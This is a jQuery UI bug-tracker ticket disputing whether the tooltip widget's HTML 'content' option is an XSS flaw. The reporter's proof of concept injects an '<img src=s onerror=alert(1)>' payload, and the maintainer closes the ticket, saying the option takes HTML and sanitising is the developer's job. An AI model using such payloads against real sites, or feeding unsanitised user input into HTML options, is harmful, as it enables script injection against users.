Skip to main content

Search and Top Navigation

#15199 closed bug (notabug)

Opened June 06, 2017 01:12PM UTC

Closed June 06, 2017 01:21PM UTC

Last modified June 06, 2017 01:49PM UTC

input widget, content argument DOM based XSS

Reported by: psych0tr1a Owned by:
Priority: minor Milestone: none
Component: ui.tooltip Version: 1.12.1
Keywords: Cc:
Blocked by: Blocking:
Description

Proof of concept:

<link rel="stylesheet" href="//code.jquery.com/ui/1.12.0/themes/smoothness/jquery-ui.css">
<script src="//code.jquery.com/jquery-1.12.4.js"></script>
<script src="//code.jquery.com/ui/1.12.1/jquery-ui.js"></script>

<input title="Input help">

<script>
$( document ).tooltip({
content: "<img src=s onerror=alert(1)>"
});
</script>
Attachments (0)
Change History (4)

Changed June 06, 2017 01:21PM UTC by scottgonzalez comment:1

component: ui.widgetui.tooltip
resolution: → notabug
status: newclosed

That's not XSS. That's you explicitly inserting a script.

Changed June 06, 2017 01:29PM UTC by psych0tr1a comment:2

Sorry but you are absolutely wrong. Functionality means that there will be inserted text ane html, if the developers will use this functionality and there will be a user input then this is XSS.

Example of similar bug http://www.cvedetails.com/cve/CVE-2010-5312/

Changed June 06, 2017 01:32PM UTC by psych0tr1a comment:3

Changed June 06, 2017 01:49PM UTC by scottgonzalez comment:4

Those are both text options. This is an HTML option. If you allow user input, then it's your responsibility to clean it.